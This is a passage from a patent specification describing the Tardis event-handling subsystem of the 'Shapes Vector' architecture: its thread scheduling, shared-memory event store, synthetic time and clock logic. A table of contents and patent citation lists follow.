2. Select an operator, either is or is not.
3. From the Continent list, select the continent that contains the locations in the region you are creating.
4. Click Add.
5. Click Create.
You can now create a topology record using the custom region you created.
Understanding how the BIG-IP system prioritizes topology records
When Topology load balancing is configured, the order of the topology records is vital and affects how the BIG-IP® system scores the pools or pool members to which it load balances DNS name resolution requests. By default, the BIG-IP system prioritizes topology records using Longest Match sorting. As a result, topology records are automatically sorted based on a specific criteria each time the BIG-IP system configuration loads. Alternatively, you can disable Longest Match sorting and customize the order of the topology records in the list.
Understanding Longest Match topology record sorting
When Longest Match is enabled, the BIG-IP® system sorts the topology records by the LDNS request source statement, the destination statement, and the weight of the record.
The system first sorts the topology records by the type of LDNS request source statement using this order from highest to lowest:
1. IP subnet in CIDR format (the system places the most specific IP subnet at the top of the list; for example, 10.15.1.1/32, 10.15.1.0/24, 10.15.0.0/16, 10.0.0.0/8)
2. Region
3. ISP
4. State
5. Country
6. Continent
7. LDNS Request Source negation (record that excludes an LDNS)
8. Wildcard record (the system sorts the wildcard record to the bottom of the list, because this record is the least specific)
If the type of LDNS request source statement is the same in multiple topology records, the BIG-IP system then sorts these records by the type of destination statement using this order from highest to lowest:
1. IP subnet in CIDR format (the system places the most specific IP subnet at the top of the list; for example, 10.15.1.1/32, 10.15.1.0/24, 10.15.0.0/16, 10.0.0.0/8)
2. Data center
3. Pool
4. Region (customized collection of criteria)
5. ISP
6. State
7. Country
8. Continent
9. Destination negation (record that excludes a destination)
10. Wildcard record (the system sorts the wildcard to the bottom of the list, because this record is the least specific)
If the type of LDNS request source statement is the same in multiple topology records and the type of destination statement is the same in those records, the system then uses the value of the weight from highest to lowest to sort the records.
The example shows a list of topology records sorted automatically using Longest Match. Note that the fourth and fifth records have the same LDNS subnet and the destinations are both of type State. Therefore, the weight determines the position in the list; thus, the record with the highest weight is first.
1. ldns: subnet 192.168.69.133/32 destination: subnet 10.15.1.1/32 weight: 500
2. ldns: subnet 192.168.69.133/32 destination: datacenter /Common/NorthAmerica weight: 400
3. ldns: subnet 192.168.69.0/24 destination: pool /Common/NorthAmerica weight 300
4. ldns: subnet 192.168.0.0/16 destination: state NY weight 200
5. ldns: subnet 192.168.0.0/16 destination: state WA weight 100
Customizing the sort order of topology records
Determine the order in which you want the topology records you create to be sorted.
Change the sort order of the topology records when you do not want the system to use the Longest Match sort order.
1. On the Main tab, click DNS > GSLB > Topology > Records .
2. Click the Change Order button.
3. Clear the Longest Match check box.
4. To change the order of the records in the Topology Record List, do the following:
1. From the list, select a topology record.
2. Click the Up or Down button to move the record to the preferred position in the list.
5. Click Update.
The BIG-IP system uses the customized Topology Record List for topology load balancing.
Important: The BIG-IP system saves only one set of ordered topology records; if you re-enable Longest Match, your custom ordering will no longer be available.
Configuring Longest Match
Ensure that topology records exist in the configuration.
Configure the BIG-IP system to order the topology records using Longest Match.
1. On the Main tab, click DNS > GSLB > Topology > Records .
2. Click the Change Order button.
3. Select the Longest Match check box.
4. Click Update.
The BIG-IP system uses Longest Match sorting to order the topology records in a list.
Creating a topology record
Before you create topology records, it is essential that you understand how the system sorts the topology record list. Additionally, you must understand how the system uses the ordered list of records to assign scores to the pools or pool members, to which the BIG-IP system load balances DNS requests.
Create topology records that instruct the BIG-IP system where to route DNS name resolution requests when Topology load balancing is enabled.
Tip: The BIG-IP system is more efficient when using regions for Topology load balancing.
1. On the Main tab, click DNS > GSLB > Topology .
2. Click Create.
The new record screen opens.
3. To create an LDNS request source statement, use the Request Source settings:
1. Select an origin type from the first list.
2. Select an operator, either is or is not.
3. Define the criteria for the request source statement based on the request source type you selected.
4. To create a destination (server object) statement, use the Destination settings:
1. Select a destination type from the first list.
2. Select an operator, either is or is not.
3. Define the criteria for the destination statement based on the destination type you selected.
5. In the Weight field, specify the priority of this record.
6. Click Create.
Deleting a topology record
Delete existing topology records as your network changes. For example, when you add a new data center to your network, the topology records that the BIG-IP system uses to distribute DNS name resolution requests can become obsolete, requiring deletion.
Note: You cannot modify topology records; you can delete records and create new ones that meet your needs.
1. On the Main tab, click DNS > GSLB > Topology .
2. Select the topology record that you want to remove from the topology records list by selecting the corresponding Select check box.
3. Click Delete.
A confirmation screen appears.
4. Click Delete.
About Topology load balancing for a wide IP
When you use the topology load balancing method at a wide IP level with topology records that have a Data Center destination, the topology records have no effect. (This is because load balancing at a wide IP level selects between GTM pools, and GTM pools do not have a data center associated with them.) Topology records that have a Data Center destination have an effect only when using the topology load balancing method at the pool level.
Example configuration: Topology load balancing for a wide IP
This example illustrates how DNS name resolution requests are load balanced when a wide IP is configured for Topology load balancing. An administrator configures the wide IP www.siterequest.net for Topology load balancing. The wide IP contains three pools: Pool1 and Pool3 are located in the North America data center; Pool2 is located in the South America data center. Next, the administrator creates topology records, as shown in this figure, and ensures that Longest Match is enabled on the BIG-IP® system.
Topology records for a wide IP configured for Topology load balancing
Topology records for a wide IP configured for Topology load balancing
The first topology record directs all DNS name resolution requests from an LDNS in the IP subnet 11.1.0.0/16 to Pool1. The second topology record directs all DNS name resolution requests from an LDNS in the IP subnet 10.1.0.0/16 to Pool2. The third topology record is the least specific. It directs DNS name resolution requests from an LDNS in any IP subnet to Pool3. However, it is important to note that the weight of the third topology record is lower than the weights of the other topology records.
Topology load balancing at the wide IP-level
BIG-IP system load balancing DNS requests using a wide IP configured for Topology load balancing
1. A client in New York makes a DNS request.
2. LDNS 11.1.0.1 queries the BIG-IP system in the North America data center.
3. The BIG-IP system directs the LDNS to Pool1. To determine this answer, for each pool, one at a time, the BIG-IP system iterates through the list of two topology records to find a match. Pool1 matches the first topology record in the list, because both the LDNS request source (11.1.0.1) and the Destination (Pool1) of the DNS request match the first topology record; therefore, the BIG-IP system assigns a score of 100 to Pool1. For Pool2, there is no matching topology record that contains both the LDNS request source (11.1.0.1) and the Destination (Pool2); therefore, the BIG-IP system assigns a score of zero to Pool2. Pool3, matches the third topology record in the list, because both the LDNS request source (11.1.0.1) and the Destination (Pool3) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 10 to Pool3. The BIG-IP system directs the LDNS to send the request to the pool with the highest score.
4. The LDNS sends the DNS request to Pool1 in the North America data center. How the system distributes the DNS requests to the members of Pool1 is not depicted in this illustration, but is based on the load balancing method configured for Pool1.
5. A client in Lima makes a DNS request.
6. LDNS 10.1.0.1 queries the BIG-IP system in the North America data center.
7. The BIG-IP system directs the LDNS to Pool2. To determine this answer, for each pool, one at a time, the BIG-IP system iterates through the list of two topology records to find a match. For Pool1, there is not a matching topology record that contains both the LDNS request source (10.1.0.1) and the Destination (Pool1); therefore, the BIG-IP system assigns a score of zero to Pool1. Pool2 matches the second topology record in the list, because both the LDNS request source (10.1.0.1) and the Destination (Pool2) of the DNS request match the second topology record; therefore, the BIG-IP system assigns a score of 100 to Pool2. Pool3, matches the third topology record in the list, because both the LDNS request source (10.1.0.1) and the Destination (Pool3) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 10 to Pool3. The BIG-IP system directs the LDNS to send the request to the pool with the highest score.
8. The LDNS sends the DNS request to Pool2 in the South America data center. How the system distributes the DNS requests to the members of Pool2 is not shown in this illustration, but is based on the load balancing method configured for Pool2.
9. A client in Chicago makes a DNS request.
10. LDNS 12.1.0.1 queries the BIG-IP system in the North America data center.
11. The BIG-IP system directs the LDNS to Pool3. To determine this answer, for each pool, one at a time, the BIG-IP system iterates through the list of two topology records to find a match. For Pool1, there is not a matching topology record that contains both the LDNS request source (12.1.0.1) and the Destination (Pool1); therefore, the BIG-IP system assigns a score of zero to Pool1. For Pool2, there is not a matching topology record that contains both the LDNS request source (12.1.0.1) and the Destination (Pool1); therefore, the BIG-IP system assigns a score of zero to Pool2. Pool3, matches the third topology record in the list, because both the LDNS request source (12.1.0.1) and the Destination (Pool3) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 10 to Pool3. The BIG-IP system directs the LDNS to send the request to the pool with the highest score.
12. The LDNS sends the DNS request to Pool3 in the North America data center. How the system distributes the DNS requests to the members of Pool3 is not depicted in this illustration, but is based on the load balancing method configured for Pool3.
Configuring a wide IP for Topology load balancing
Before you configure a wide IP for Topology load balancing, ensure the following:
• At least two pools are associated with the wide IP that you are configuring for Topology load balancing.
• Topology records that define how you want the BIG-IP system to load balance DNS name resolution requests are configured.
You can use Topology load balancing to distribute DNS name resolution requests among the pools in a wide IP based on the geographic location of both the client making the request and the pool that handles the response.
1. On the Main tab, click DNS > GSLB > Wide IPs .
The Wide IP List screen opens.
2. Click the name of the wide IP you want to modify.
3. On the menu bar, click Pools.
4. From the Load Balancing Method list, select Topology.
5. Click Update.
Repeat this process for each wide IP that you want to configure for Topology load balancing.
About Topology load balancing for a pool
When you configure a pool for Topology load balancing, you can route DNS requests to the data center that is closest to the client making the request. With this configuration, the BIG-IP® system load balances DNS name resolution requests to the members of the pool.
Example configuration: Topology load balancing for a pool
This example illustrates how DNS name resolution requests are load balanced when a pool is configured for Topology load balancing. An administrator configures pools in two different data centers: the North America data center (North America DC) and the South America data center (South America DC) for Topology load balancing. A server that contains the pool members 10.10.10.1 - 10.10.10.3 resides in the North America DC. The server that contains the pool members 11.10.10.1 - 11.10.10.3 resides in the South America DC. Next, the administrator creates topology records, as shown in the following figure, to load balance DNS requests to members of the pools, and ensures that Longest Match is enabled on the BIG-IP® system.
Topology record that the Global Traffic Manager uses to direct these connection requests
Topology records for a pool configured for Topology load balancing
The first topology record directs all DNS name resolution requests from an LDNS in Bolivia to the South America DC. The second topology record directs all DNS name resolution requests from an LDNS in Peru to the South America DC. The third topology record directs all DNS name resolution requests from an LDNS in the United States to the North America DC. The fourth topology record directs all DNS name resolution requests from an LDNS in Canada to the North America DC.
Topology load balancing at the pool level
Pool configured for Topology load balancing
1. A client in the U.S. makes a DNS request.
2. An LDNS in the U.S. queries the BIG-IP system in the North America DC.
3. The BIG-IP system directs the LDNS to a member of Pool1 in the North America DC. To determine this answer, for each pool member, one at a time, the BIG-IP system iterates through the list of topology records to find a match. Pool members 10.10.10.1 - 10.10.10.3 each match the third topology record in the list, because both the LDNS request source (U.S.) and the Destination (North America DC) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 20 to each of those pool members. For each of the pool members 11.10.10.1 - 11.10.10.3, there is no matching topology record that contains both the LDNS request source (U.S.) and the Destination (South America DC); therefore, the BIG-IP system assigns a score of zero to each of those pool members. The BIG-IP system directs the LDNS to send the request to the pool member with the highest score.
4. The LDNS sends the DNS request to a pool member in the North America DC. Because all of the pool members in the North America DC have the same score, the system distributes the DNS requests to the pool members in a round robin fashion.
5. A client in Bolivia makes a DNS request.
6. An LDNS in Bolivia queries the BIG-IP system in the North America DC.
7. The BIG-IP system directs the LDNS to a pool member in the South America DC. To determine this answer, for each pool member, one at a time, the BIG-IP system iterates through the list of topology records to find a match. For each of the pool members 10.10.10.1 - 10.10.10.3 there is no matching topology record that contains both the LDNS request source (Bolivia) and the Destination (North America DC); therefore, the BIG-IP system assigns a score of zero to each of those pool members. Pool members 11.10.10.1 - 11.10.10.3 each match the first topology record in the list, because both the LDNS request source (Bolivia) and the Destination (South America DC) of the DNS request match the first topology record; therefore, the BIG-IP system assigns a score of 10 to each of those pool members. The BIG-IP system directs the LDNS to send the request to the pool member with the highest score.
8. The LDNS sends the DNS request to a pool member in the South America DC. Because all of the pool members in the South America DC have the same score, the system distributes the DNS requests to the pool members in a round robin fashion.
Configuring a pool for Topology load balancing
Before you configure a pool for Topology load balancing, ensure the following:
• The pool you are configuring for Topology load balancing contains at least two pool members.
• Topology records that define how you want the BIG-IP system to load balance DNS name resolution requests are configured.
You can use Topology load balancing to distribute DNS name resolution requests among the members of a pool based on the geographic location of both the client making the request and the member of the pool that handles the response.
1. On the Main tab, click DNS > GSLB > Pools .
The Pools list screen opens.
2. Click the name of the pool you want to modify.
3. On the menu bar, click Members.
4. In the Load Balancing Method area, from the Preferred list, select Topology.
5. In the Load Balancing Method area, from the Alternate list, select Round Robin.
6. In the Load Balancing Method area, from the Fallback list, select None.
7. Click Update.
Repeat this process for each pool that you want to configure for Topology load balancing.
About Topology load balancing for both wide IPs and pools
You can configure a wide IP for Topology load balancing. You can also configure each pool in the wide IP for Topology load balancing. When you configure both a wide IP and the pools in the wide IP for Topology load balancing, the BIG-IP® system uses topology records to load balance DNS name resolution requests first to a pool in the wide IP, and then, to a member of the pool.
Note:
When configuring both the wide IP and the pools in the wide IP for Topology load balancing, it is important to set the Fallback load balancing method for each pool to None. If you do not, DNS can send a DNS request to a pool in the wide IP even when no pool members are available. In this case, the load balancing algorithm for the pool would then fall back to BIND (static DNS). When you set the Fallback load balancing method for each pool to None, if no members of a pool are available, BIG-IP DNS sends the DNS request to another pool in the wide IP.
About Topology load balancing for CNAME wide IPs and pools
For a CNAME query against a CNAME wide IP with a CNAME pool, you can use Topology load balancing at the wide IP level to make a pool selection, given that matching topology entries are configured to specify a CNAME pool on the wide IP. However, when using Topology load balancing at the pool level to make pool member selections, the BIG-IP® system relies on a metrics pull-up to get the topology scores needed to pick a pool member because the pool members are non-terminal.
If the pool members are terminal members (for example, on an A or AAAA type pool), then you can use them to match against the topology entries and get scores. But Topology load balancing cannot be used to get scores for non-terminal members without doing a metrics pull-up because there is no way to specify a wide IP or DNS name in a given topology entry. Therefore, for a CNAME query against a CNAME wide IP with a CNAME pool, you can use Topology load balancing to pick a pool at the wide IP level, but it will not be used (even if configured) at the pool level to pick a pool member because the BIG-IP system will not perform a metrics pull-up.
About IP geolocation data
The BIG-IP system uses an IP geolocation database to determine the origin of DNS requests. The database included with the BIG-IP system provides geolocation data for IPv6 addresses at the continent and country levels. It also provides geolocation data for IPv4 addresses at the continent, country, state, ISP, and organization levels. The state-level data is worldwide, and thus includes designations in other countries that correspond to the U.S. state-level in the geolocation hierarchy, such as, provinces in Canada.
Note: If you require geolocation data at the city-level, contact your F5 Networks sales representative to purchase additional database files.
About topology records and IP geolocation data
The BIG-IP® system uses an IP geolocation database to determine the IP addresses that match the geographic names that you define in a topology record, such as continent and country.
Downloading and installing updates to the IP geolocation data
You can download a monthly update to the IP geolocation database from F5 Networks. The BIG-IP system uses the IP geolocation database to determine the origin of DNS name resolution requests.
1. Log in to the F5 Networks customer web site at http://downloads.f5.com, and click Find a Download.
2. In the F5 Product Family column, find BIG-IP, and then in the Product Line column, click either BIG-IP v11.x/Virtual Edition.
3. Select a version from the list preceding the table.
4. In the Name column, click GeolocationUpdates.
5. Click I Accept to accept the license.
6. In the Filename column, click the name of the most recent compressed file that you want to download.
7. In the Ready to Download table, click the download method that you want to use.
8. In the dialog box, click OK.
9. Select the directory in which you want to save the compressed file, and then decompress the file to save the RPM files on the system.
10. To install and load one of the RPM files, run this command (the path and file name are case-sensitive):
geoip_update_data -f </path to RPM file and file name >.
The system installs and loads the specified database file.
11. Repeat step 10 for each of the RPM files that you saved to the system in step 9.
You can access the ISP and organization-level geolocation data for IPv4 addresses only using the iRules whereis command.
Reloading default geolocation data using the Configuration utility
Before you reload the default geolocation data, delete the RPM files that are in the /shared/GeoIP directory.
To uninstall an update to the IP geolocation database, reload the default geolocation database files using the Configuration utility.
1. At the BASH prompt, run this command to query the RPM database and determine what geolocation data is installed:
rpm -qa --dbpath /shared/lib/rpm/
The system returns a list of RPMs, for example:
geoip-data-ISP-1.0.0-20110203.61.0
geoip-data-Region2-1.0.0-20110203.61.0
geoip-data-Org-1.0.0-20110203.61.0
2. To uninstall the RPMs, run this command for each RPM in the list:
rpm -e --dbpath /shared/lib/rpm/ <name of file>
For example, to uninstall geoip-data-ISP-1.0.0-20110203.61.0, run this command: rpm -e --dbpath /shared/lib/rpm/ geoip-data-ISP-1.0.0-20110203.61.0
3. To remove the symlink in the /shared/GeoIP directory, run this command:
rm -f /shared/GeoIP/*
4. Log on to the Configuration utility.
5. On the Main tab, click System > Configuration .
6. In the Geolocation area, click Reload in the Operations setting.
The system reloads the default geolocation database files that are stored in /usr/share/GeoIP.
Reloading default geolocation data using tmsh
To uninstall an update to the IP geolocation database, delete the RPM files, and then reload the default geolocation database files using tmsh.
1. At the BASH prompt, to query the RPM database and determine what geolocation data is installed, run this command:
rpm -qa --dbpath /shared/lib/rpm/
The system returns a list of RPMs, for example:
geoip-data-ISP-1.0.0-20110203.61.0
geoip-data-Region2-1.0.0-20110203.61.0
geoip-data-Org-1.0.0-20110203.61.0
2. To uninstall the RPMs, for each RPM in the list, run this command:
rpm -e --dbpath /shared/lib/rpm/ <name of file>
For example, to uninstall geoip-data-ISP-1.0.0-20110203.61.0, run this command: rpm -e --dbpath /shared/lib/rpm/ geoip-data-ISP-1.0.0-20110203.61.0
3. To remove the symlink in the /shared/GeoIP directory, run this command:
rm -f /shared/GeoIP/*
4. Log on to tmsh.
5. Run this command:
load / sys geoip
The system reloads the default geolocation database files that are stored in /usr/share/GeoIP.
|
__label__pos
| 0.773545 |
Exchange Alphabets ISC 2013 Theory
Design a class Exchange to accept a sentence and interchange the first alphabet with the last alphabet for each word in the sentence, with single letter words remaining unchanged. The words in the input sentence are separated by a single blank space and terminated by a full stop.
Example:
INPUT: It is a warm day.
OUTPUT: tI si a marw yad
Some of the data members and member functions are given below:
Class name: Exchange
Data members/instance variables:
sent: stores the sentence.
rev: to store the new sentence.
size: stores the length of the sentence.
Member functions:
Exchange(): default constructor.
void readSentence(): to accept the sentence.
void exFirstLast(): extract each word and interchange the first and last alphabet of the word and form a new sentence rev using the changed words.
void display(): display the original sentence along with the new changed sentence.
Specify the class Exchange giving details of the constructor, void readSentence(), void exFirstLast() and void display(). Define the main() function to create an object and call the functions accordingly to enable the task.
import java.io.*;
class Exchange{
private String sent;
private String rev;
private int size;
public Exchange(){
sent = new String();
rev = new String();
size = 0;
}
public void readSentence()throws IOException{
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
System.out.print("Sentence: ");
sent = br.readLine();
sent = sent.trim();
size = sent.length();
}
public void exFirstLast(){
String word = new String();
for(int i = 0; i < size; i++){
char ch = sent.charAt(i);
if(ch == ' ' || ch == '.' || ch == '?' || ch == '!'){
if(word.length() == 1){
rev += word + " ";
word = new String();
}
else{
int len = word.length();
char first = word.charAt(0);
char last = word.charAt(len - 1);
String middle = word.substring(1, len - 1);
rev += last + middle + first + " ";
word = new String();
}
}
else
word += ch;
}
rev = rev.trim();
}
public void display(){
System.out.println("Original sentence: " + sent);
System.out.println("New sentence: " + rev);
}
public static void main(String args[])throws IOException{
Exchange obj = new Exchange();
obj.readSentence();
obj.exFirstLast();
obj.display();
}
}
2 thoughts on “Exchange Alphabets ISC 2013 Theory
1. Sir,a question is given which states that:
Given the boolean function F(A, B, C, D) = ∑(0, 2,3,6,8,10,11,14,15):
i) Reduce the above expression by using 4-variable Karnaugh Map, showing the various groups (i.e. octals, quads and pairs).
ii) Draw the logic gate diagram for the reduced expression. Assume that the variables and their complements are available as inputs.
Sir,can you show me the logic circuit and the 4-variable K-map of the above question ?
Leave a Reply
Your email address will not be published. Required fields are marked *
This site uses Akismet to reduce spam. Learn how your comment data is processed.
|
__label__pos
| 0.999162 |
TeX - LaTeX Stack Exchange is a question and answer site for users of TeX, LaTeX, ConTeXt, and related typesetting systems. It's 100% free, no registration required.
Sign up
Here's how it works:
1. Anybody can ask a question
2. Anybody can answer
3. The best answers are voted up and rise to the top
I am required to typeset some (long) figure captions in the "half-title page(s)" as they do not fit in one page with the figure, for a similar example see this link (except that on the first page I would put the caption instead of "Appendix".
https://etd.helpdesk.ufl.edu/present/halftitle.html
In other words, I need to typeset captions as if they are texts (except that the caption title needs to appear in the \listoffigures, which is taken care of by \captionof from the caption package.) However my situation is a bit different:
1. The caption is very long and it does not fall in one page, so I need more than one "half-title page(s)" and cannot use \captionof command. How can I manually typeset a caption as if it it text and have the entry appear int the LOF?
2. Every page after the first half-title page needs to have a header showing "Figure X: continued", including the page with the figure on it. How can I enable headers only for these several "half-title pages", but not for the rest of the document? Even a more "manual" implementation would suffice.
I've searched and attempted a bit but nothing really satisfies the requirement. Thanks for any suggestions! Here is a MNWE for your convenience:
\documentclass{report}
\usepackage{setspace}
\usepackage{lipsum}
\begin{document}
\listoffigures
\doublespacing
\clearpage
Figure 1: \lipsum*
% however for the 2nd page of caption, a header "Figure 1: continued"
%on top of each page is required
\clearpage
\centering{Figure 1: continued}
% how to get this Figure X showing the right number as "Figure 1",
% if I cannot do this with a header (but only in this part of document)?
\begin{figure}
\end{figure}
\end{document}
share|improve this question
(I know this doesn’t help really:) Are you sure that you want to do this? In my opinion a caption should be a short text explaining an object. If there is more to say about the object this should be done in the main/body text. So I would say it’s not a TeX but a contentual/structural problem to be solved. – Tobi Oct 22 '11 at 20:39
1
Even though it may seem trivial, it is always best to compose a MWE that illustrates the problem including the \documentclass so that those trying to help don't have to recreate it. – Peter Grill Oct 22 '11 at 20:40
@Peter Grill: A MWE is in preparation. – YIchun Oct 22 '11 at 21:30
@cmhughes: I am trying out \addtocontentsline idea, will use it in an MWE. Thanks! – YIchun Oct 22 '11 at 21:32
@Tobi: This is a complex figure that is a composition of multiple subfigures. They were made into one large figure for reasons of clarity. If these caption texts are required to be double spaced, it is quite common for the necessary caption to go beyond the space available on one page. – YIchun Oct 22 '11 at 21:42
up vote 1 down vote accepted
I'm not entirely sure I have understood the question, but here is a first attempt using fancyhdr
\documentclass{report}
\usepackage{setspace}
\usepackage{lipsum}
\usepackage{fancyhdr}
\begin{document}
\listoffigures
\doublespacing
\clearpage
\chead{Figure \ref{fig:testfigure} continued}
\pagestyle{fancy}
\thispagestyle{plain}
Figure \ref{fig:testfigure}: \lipsum*
% however for the 2nd page of caption, a header "Figure 1: continued"
%on top of each page is required
\clearpage
% how to get this Figure X showing the right number as "Figure 1",
% if I cannot do this with a header (but only in this part of document)?
\begin{figure}
\centering
\rule{20pt}{30pt}
\caption{My figure}
\label{fig:testfigure}
\end{figure}
\end{document}
Note that
• \pagestyle{fancy} turns on the header
• \thispagestyle{plain} says that this page should be plain (without a header)
This approach is quite manual and will need some care... Perhaps others have a more robust solution.
Here is more of an environment-based approach (not a great solution, as the 'caption' counter isn't actually linked to the Figure counter)- use carefully! Personally I would use the first part of my solution.
\documentclass{report}
\usepackage{setspace}
\usepackage{lipsum}
\usepackage{fancyhdr} % headers
\usepackage{placeins} % provides \FloatBarrier
\usepackage{flafter} % ensures figures don't appear before
% they appear in the text
\newcounter{pseudocaptioncount}
\setcounter{pseudocaptioncount}{0}
\newenvironment{pseudocaption}%
{%
\FloatBarrier
\clearpage
\refstepcounter{pseudocaptioncount}%
\thispagestyle{plain}%
\chead{Figure \thepseudocaptioncount\, continued}
Figure \thepseudocaptioncount:%
}%
{}
\begin{document}
\listoffigures
% set the pagestyle as fancy
\pagestyle{fancy}
\doublespacing
\begin{pseudocaption}
\lipsum*
\end{pseudocaption}
\begin{figure}
\centering
\rule{20pt}{30pt}
\caption[Short caption]{}
\end{figure}
\begin{pseudocaption}
\lipsum*
\end{pseudocaption}
\begin{figure}
\centering
\rule{20pt}{30pt}
\caption[Another short caption]{}
\end{figure}
\end{document}
share|improve this answer
This works except that in the place of Figure 1, I got Figure ??. I added/moved \phantomsection\lable{fig:testfigure} to the first page of the caption, however, LaTeX still complains about unsolved labels. Also, which counter do I need to increment to utilize the automatic labeling mechanism of LaTeX. – YIchun Oct 23 '11 at 0:05
@YIchun: Remember to compile twice :) – cmhughes Oct 23 '11 at 0:15
I did compile many times on your 1st example and always got warningand ?? in pdf, and it turned out that's due to my deletion of the \label line. However, your 2nd example worked perfectly! – YIchun Oct 23 '11 at 0:47
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.999299 |
MBR vs GPT: Which One to Choose?
0
60
MBR vs GPT
MBR vs GPT
Setting up an HDD or SSD Partition can be difficult.
And it isn’t anywhere close to choosing between the two Partition Table MBR & GPT.
It’s like crushing a stone using BARE HANDS.
It’s difficult but once you know the trick or in this case, it’s the FACTS that you can read to find the RIGHT answer.
The answer that suits your CASE. So, going ahead in this post, I’ll tell you:
✅What is a PARTITION?
✅How can you the Partition Table of a DISK?
✅MBR vS GPT?
✅And lastly, my take on this MBR vs GPT battle.
Now, let’s get started:
What is a Partition?
When you virtually divide an HDD or SSD into multiple drives, the process is called PARTITION. Depending on user requirements, each partition can vary in size.
Some partitions are used to install an OPERATING SYSTEM & some are used to store user data and files. Let me explain this to you with an example –
In a Windows PC, the labeled ‘C’ drive is used as a partition where Windows OS, third-party programs are installed (Commonly). Then it further has a small recovery partition to restore the system.
Similarly, labeled disk: D, E… to store user data & files.
How to Check Which Partition Table Your Disk Is Using
You can easily check the Partition table of your disk using an in-built disk management tool.
Using Disk Management
• First, hit ‘Windows + R’ on your keyboard & in the search box, type “diskmgmt.msc” and press ENTER.
• Locate the disk you want to check in the Disk Management window. Right-click it and select “Properties.”
MBR vs GPT: Which One to Choose? 1
• Click over to the “Volumes” tab. To the right of “Partition style,” you’ll see either “Master Boot Record (MBR)” or “GUID Partition Table (GPT),” depending on which the disk is using.
MBR vs GPT: Which One to Choose? 2
MBR vs GPT: Which One Is Better?
It isn’t that easy to choose between the two MBR & GPT partition. However, there are certain sets of conditions where you can use either of them as a partition.
When to Choose GPT Partition
✅An MBR disk can support up to 4 partitions at a time and on the other hand, a GPT disk supports up to 128 partitions. So, it would be wise to choose GPT over the MBR partition.
✅If your HDD usage is limited to 2 TB or less then stick with the MBR partition. But if you need larger storage space especially to employ a 4K native sector for editing high-quality videos then go with GPT.
✅Where does security stand in your checklist? If it’s at the TOP, then GPT disk is the most suitable option for you. GPT disks use primary and backup partition tables for redundancy and CRC32 fields for improved partition data structure integrity. Thereby, providing better security than an MBR partition.
✅Firstly, head over to the Boot Menu to see whether your PC supports UEFI. If it does, switch the default windows drive from MBR to GPT. This will miraculously boot the WINDOWS PC faster & make it much more STABLE than it was ever before.
When to Choose MBR
✅A 64-bit Windows OS can only boot from a GPT disk. And if you’ve got a 32-bit window, don’t bother using it on GPT disk as this may even F*CK UP your PC.
✅As I said earlier, go to the Legacy boot mode to see if your motherboard supports UEFI boot or not. If it doesn’t, stick with the MBR disk as this can keep Windows bootable.
Well, I’ve answered your question on what to choose between MBR & GPT. I’ve laid out all the OPTIONS, FACTS in front of you.
The final choice is yours. What do you WANT? An MBR or GPT partition?
Do let me know about it in the comments section given below.
Final Verdict – SHOULD YOU UPGRADE?
Despite all the Valid pointer I specified in the MBR vs GPT battle, are you still confused about which one to choose?
Well, allow me to share my HONEST opinion with you.
If at present any of your disks is still using an MBR partition table, you might be dying away to upgrade to the newer GPT standard.
But I won’t recommend you to do this.
YOU KNOW WHY?
Because why would you want to risk your fine-running PC? It’s easy to destroy the MBR sector of the drive & it’s nearly impossible to boot that up again.
And once you’re in the MIX, you would end up requiring a USB drive to create a recovery disk with Windows or Linux.
Even I had the same out of curiosity but I ended up regretting & cursing myself as the issue caused a headache.
That being said, there are still some conditions that you can monitor to use or upgrade over the MBR or GPT disks. You can check out in the previous section where I’ve distinguished an MBR vs GPT battle.
And in the meanwhile, you can use Microsoft Total PC Cleaner to clean up your PC from cookies, cache & unnecessary files.
LEAVE A REPLY
Please enter your comment!
Please enter your name here
|
__label__pos
| 0.917905 |
advertisement
Article:
From Exile to X11: A Journey Through Time
Subject: Command line is no closer than GUI
Date: 2003-03-17 12:55:47
From: anonymous2
Quote:
----
Interestingly, many people think of Terminal as "an application that lets you type commands." In a way, this is true, but it's useful to think of Terminal as a window into the true operating system itself.
----
Actually this couldn't be more false. Neither
the GUI or the command line is closer to the true operating system.
I have been using Unix systems for >10years now, and it is only in the last 2-3 years that I came to realize that.
A shell is no closer to the system/kernel than an X11/Cocoa/Carbon/... application is.
A failure to understand that shows a lack of understanding of how unix systems are structured.
Eric
1 to 1 of 1
1. Command line is no closer than GUI---hear, hear!
2003-03-17 16:23:24 halliday [View]
1 to 1 of 1
|
__label__pos
| 0.50628 |
[v10,2/3] dts: VLAN test suite implementation
Message ID [email protected] (mailing list archive)
State Superseded, archived
Delegated to: Thomas Monjalon
Headers
Series [v10,1/3] dts: add VLAN methods to testpmd shell |
Checks
Context Check Description
ci/checkpatch success coding style OK
Commit Message
Dean Marx July 3, 2024, 4:50 p.m. UTC
Test suite for verifying VLAN filtering, stripping, and insertion
functionality on Poll Mode Driver.
Signed-off-by: Dean Marx <[email protected]>
---
dts/tests/TestSuite_vlan.py | 171 ++++++++++++++++++++++++++++++++++++
1 file changed, 171 insertions(+)
create mode 100644 dts/tests/TestSuite_vlan.py
Comments
Jeremy Spewock July 9, 2024, 9:22 p.m. UTC | #1
I just had one minor comment, otherwise:
Reviewed-by: Jeremy Spewock <[email protected]>
On Wed, Jul 3, 2024 at 12:51 PM Dean Marx <[email protected]> wrote:
<snip>
> +
> + def vlan_setup(self, port_id: int, filtered_id: int) -> TestPmdShell:
> + """Setup method for all test cases.
> +
> + Args:
> + shell: TestPmdShell object that is being used inside test case.
It seems this argument was removed from the method, it's probably
better to remove it from this doc-string as well.
> + port_id: Number of port to use for setup.
> + filtered_id: ID to be added to the vlan filter list.
> + """
> + testpmd = TestPmdShell(node=self.sut_node)
> + testpmd.set_forward_mode(SimpleForwardingModes.mac)
> + testpmd.set_promisc(port_id, False)
> + testpmd.vlan_filter_set(port=port_id, on=True)
> + testpmd.rx_vlan(vlan=filtered_id, port=port_id, add=True)
> + return testpmd
> +
<snip>
> 2.44.0
>
Patch
diff --git a/dts/tests/TestSuite_vlan.py b/dts/tests/TestSuite_vlan.py
new file mode 100644
index 0000000000..903398a8a8
--- /dev/null
+++ b/dts/tests/TestSuite_vlan.py
@@ -0,0 +1,171 @@
+# SPDX-License-Identifier: BSD-3-Clause
+# Copyright(c) 2024 University of New Hampshire
+
